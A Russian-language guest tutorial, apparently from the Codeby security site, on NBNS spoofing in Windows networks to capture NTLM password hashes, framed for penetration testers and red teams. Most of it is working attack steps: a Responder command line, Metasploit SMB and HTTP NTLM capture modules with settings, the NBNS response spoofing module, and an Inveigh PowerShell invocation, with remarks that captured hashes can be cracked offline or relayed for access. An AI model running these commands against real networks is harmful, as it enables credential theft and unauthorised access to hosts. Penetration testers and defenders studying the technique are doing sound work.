• Курсы Академии Кодебай, стартующие в мае - июне, от команды The Codeby

    1. Цифровая криминалистика и реагирование на инциденты
    2. ОС Linux (DFIR) Старт: 16 мая
    3. Анализ фишинговых атак Старт: 16 мая Устройства для тестирования на проникновение Старт: 16 мая

    Скидки до 10%

    Полный список ближайших курсов ...

Гостевая статья NBNS Спуфинг

Служба имен Netbios (NBT-NS) используется в сетях Windows для связи между хостами. Системы будут использовать эту службу при разрешении имен через LHOSTS и DNS. Злоупотребление этим сервисом для выполнения атаки «человек посередине» - это распространенная тактика, которая широко используется тестерами на проникновение и красными командами, чтобы получить первоначальную точку для закрепления внутри системы. Полученные хэши паролей могут быть взломаны в автономном режиме или могут быть использованы в сочетании с ретрансляцией для достижения законного доступа к хостам.

Responder
Trustwave SpiderLabs разработал Responder для реализации спуфинговой атаки NBNS. Запуск инструмента со следующими аргументами инициирует отравление различными протоколами, требующими аутентификации, такими как SMB, HTTP и т. д.

Код:
responder -I eth0 -e 10.0.0.2 -b -A -v

nbns-spoofing-responder.png

Спуфинг NBNS - Responder

Когда узел в сети отправил широковещательную рассылку NetBIOS, компьютер злоумышленника отправит поддельный ответ, и узел попытается пройти аутентификацию на ресурсе, используя хэш-пароль NTLM.


nbns-spoofing-hashes-via-responder.png

NBNS Spoofing - Хеши через ответчик

Metasploit
Спуфинг NBNS может быть реализован через Metasploit Framework с использованием различных модулей, которые могут захватить вызов аутентификации при согласовании для протоколов, таких как SMB и HTTP. Для захвата хэша пароля через SMB необходимо использовать следующий модуль:

Код:
use auxiliary/server/capture/smb
set SRVHOST 10.0.0.2
set cainpwfile /tmp/cain-smb
set johnpwfile /tmp/john-smb
set logfile /tmp/logfile
run

metasploit-smb-server.png

Metasploit - SMB-сервер

Модуль для захвата проверки подлинности NTLM через HTTP можно настроить следующим образом:

Код:
use auxiliary/server/capture/http_ntlm
set SRVHOST 10.0.0.2
set SRVPORT 80
set URIPATH /
set cainpwfile /tmp/cain-http
set johnpwfile /tmp/john-http
set logfile /tmp/logfile
run

metasploit-http-server.png

Metasploit - HTTP-сервер

Следующий модуль отправит ответы службы имен NetBIOS на хосты, которые будут отправлять широковещательные запросы NetBIOS по сети.

Код:
use auxiliary/spoof/nbns/nbns_response
set SPOOFIP 10.0.0.2
run

metasploit-nbns-response-module.png

Metasploit - модуль ответа NBNS

Когда пользователь сети попытается использовать широковещательный запрос NetBIOS для идентификации ресурса, трафик будет перенаправлен на хост злоумышленника, и хеш пароля будет получен.

nbns-spoofing-hashes-via-metasploit.png

NBNS Spoofing - Хеши через Metasploit

PowerShell
реализовал эту атаку в сценарии PowerShell под названием Inveigh . Этот скрипт является частью Empire, PoshC2 и других инструментов и может быть настроен следующим образом:

Код:
Invoke-Inveigh -ConsoleOutput Y -NBNS Y -mDNS Y -HTTPS Y -Proxy Y

nbns-spoofing-powershell-inveigh.png

Спуфинг NBNS - PowerShell Inveigh

Хэш пароля пользователя будет записан, как Responder и Metasploit.

nbns-spoofing-hashes-via-inveigh.png

NBNS Spoofing - Хеши через Inveigh

Ссылки
Источник:
 
Мы в соцсетях:

Обучение наступательной кибербезопасности в игровой форме. Начать игру!